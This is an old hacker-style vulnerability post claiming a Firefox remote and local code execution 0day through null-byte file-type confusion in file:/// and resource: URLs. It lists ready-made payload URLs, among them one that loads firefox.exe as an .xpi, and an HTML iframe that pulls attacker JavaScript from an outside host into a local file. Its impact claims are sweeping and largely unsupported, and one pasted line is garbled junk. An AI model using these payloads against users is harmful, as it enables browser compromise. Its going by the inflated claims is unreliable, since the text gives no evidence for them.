Firefox Remote & Local Code Excution 0day.

Publicated on : 1181099140
I found this vulnerability in Firefox moments ago while I was playing with the urlbar.
It seems Firefox is vulnerable to null byte file type corruption. It is possible to execute files as a different filetype and trick Firefox into executing it. Is this dangerous? yeah it's pretty bad.

Pointers that are vulnerable:

file:///
resource:
Use:
[uri]/[filelocation]/[file][.ext]%00[.ext]
Example:
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html

or:

resource:///README.txt%00.html
More filetypes:

file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.js
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.pdf
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.doc
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xls
probably every filetype.

Oh and: file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xpi :)

This could lead to various exploits, to name a few:

- Dossing a user, the above example does it almost.
- Code execution
- File access
- Trojan activation
- Virus activation
- Reflective Cross Site Scripting (RXSS)
- Cross Site Request Forgeries (CSRF)

Another example
It is possible to turn regular .txt stored files into full Javascript html zombies:
file:///[filelocation]/troy.txt%00.html
troy.txt could contain:

/bin /boot /dev /etc /home /initrd /lib /lib64 /locations.diff /lost+found /media /mnt /opt /proc /root /sbin /selinux /srv /sys /tmp /usr /var
Bunch of malicious Javascript
articles/ articles_old/

Or:

<html>
<iframe name="bla" src="http://www.0x000000.com/hacks/?troy.js" width="100%" height="900"></iframe>
</html>


Well, I guess you get the point: nasty.